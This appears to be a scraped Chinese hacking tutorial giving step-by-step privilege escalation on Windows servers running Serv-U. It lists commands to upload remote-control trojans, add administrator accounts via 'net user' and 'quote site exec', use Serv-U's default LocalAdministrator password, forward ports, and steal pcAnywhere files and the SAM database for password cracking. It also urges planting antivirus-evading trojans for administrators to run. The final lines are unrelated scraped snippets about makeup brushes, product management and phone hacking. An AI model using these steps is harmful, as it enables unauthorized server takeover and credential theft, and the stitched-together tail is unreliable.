一:检测一下网站的服务器是否开了 3389 远程终端
二:检测一下服务是否用了serv-u (还有是什么版本的)
*** 一:复制一个网站 用 3389 登陆器连接一下 (是否成功)能连接了,拿下服务器的机率,提高 30%了
二:用ftp模式查下一个服务器的版本
开始 -- 运行 -- cmd -- ftp (加你要登陆的网站)
--------------------------------------------------------------------------------
之一步:最简单的 ***
看有没有权限,能不能执行命令,行的话直接传个鸽子(随便什么远程控制木马都行,成功率极低.
--------------------------------------------------------------------------------
第二步::寻找有执行的权限目录
c:\\\\winnt\\\\system32\\\\inetsrv\\\\data\\\\
c:\\\\Documents And Settings\\\\All Users\\\\
c:\\\\Program Files\\\\serv-u\\\\
C:\\\\Program Files\\\\Microsoft SQL Server\\\\
这样的目录可以直接上传鸽子,运行
-----------------------------------------------------------------------------------
第三步:传个cmd和开帐号的ftp.exe上去直接加帐号,命令就是你上传目录D:\\\\VMware Workstation\\\\cmd.exe \\"net user love love /add\\"
-----------------------------------------------------------------------------------
第四步:asp提权木马直接提权
serv-u 6.3 版本 好象用asp提权木马(不成功)
serv-u 6.2 版本 好象可以
不过提权能不能用asp木马还要看服务器,设置的变态不,假设直接用asp提权成功之后,还是不成功,但是可以在 cmd之下 用这个帐号连接一下ftp (加你提权的网站)
帐号:LocalAdministrator 密码:$ak#.1k;0@p\\"〉#1@$ak#.1k;0@p
如果成功连接后就可以直接添加管理员帐号了
命令:quote site exec (你添加的帐号) net user 123 123 /ad
quote site exec (把帐号提升到更高权限) net localgroup administartors 123 /add
---------------------------------------------------------------------------------------
第五步:pcaanywhere
C:\\\\Documents And Settings\\\\All Users\\\\Application Data\\\\Symantec\\\\pcAnywhere\\\\
这里下他的GIF文件,在本地安装pcanywhere上去
---------------------------------------------------------------------------------------
第六步:serv-u覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini
网上很多教程
----------------------------------------------------------------------------------------
第七步:Serv-U转发端口
给Latte加盐 曾经做个一个(serv-u经典提权 *** 教程)用到过这个 *** ,可以学习一下
上传个端口转发工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为$ak#.1k;0@p\\"〉#1@$ak#.1k;0@p
连接上后你就可以管理他的Serv-u了
-----------------------------------------------------------------------------------------
第八步:社会工程学之提升提权
把灰鸽子传到上面,然后转移到c盘,就等着管理员运行了,前提你的鸽子必须免杀让我看到一个不清楚的exe程序,老想点开看看,呵呵( *** 比较笨)
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就更好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
C:\WINNT\system32\config进这里下它的SAM,破解用户的密码
c:\winnt\repaire 下是备份用到破解sam密码的软件有LC,SAMinside
C:\Documents and Settings\All Users\「开始」菜单\程序\
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
到底走专业蹊径,照旧走打点蹊径?这大概是每个产物司理都思考过的问题,本文作者以武侠小说中剑宗和睦宗的比拟,对这个问题展开了阐明思考,一起来看看~ 俗话说,有人的处所就有江湖,产物司理也有本身的江湖。...
本文目录一览: 1、黑客需要学什么? 2、当黑客需要学什么 3、黑客都需要掌握哪些知识 黑客需要学什么? 您好,您的问题已收到了01、想要成为一个黑客,学习英文是非常重要的,现在大多数计算机...
小编在看过很多的美妆视频,发现有很多的美妆博主都在使用这款黛末化妆刷,好像看起来非常不错,于是小编也去买了一套,用了之后才发现已经离不开这款黛末化妆刷烁影系列了。...
本文目录一览: 1、无线摄像头能破解不 2、家里装了摄像头,有没有可能会被人入侵? 3、摄像头容易被黑客利用和攻击,家中的摄像头如何防范不法入侵? 4、据财经频道报道家庭摄像头隐私保护存漏...
真正的黑盟早就瓦解了,现在剩下的不过是一般以利益为重的人在捣鼓什么所谓的黑客技术。我劝你还是看一些黑客的书籍好一点,或者黑客教程。 加里麦金农对美国人而言,英国超级黑客加里·麦金农的危险程度与“基地”...
本文导读目录: 1、怎样简单入侵别人手机软件下载 2、通过陌陌聊天能入侵对方手机吗 3、间谍软件在全球攻击约5万个电话号码,飞马间谍软件如何入侵手机? 4、如何通过wifi入侵手机用什么软...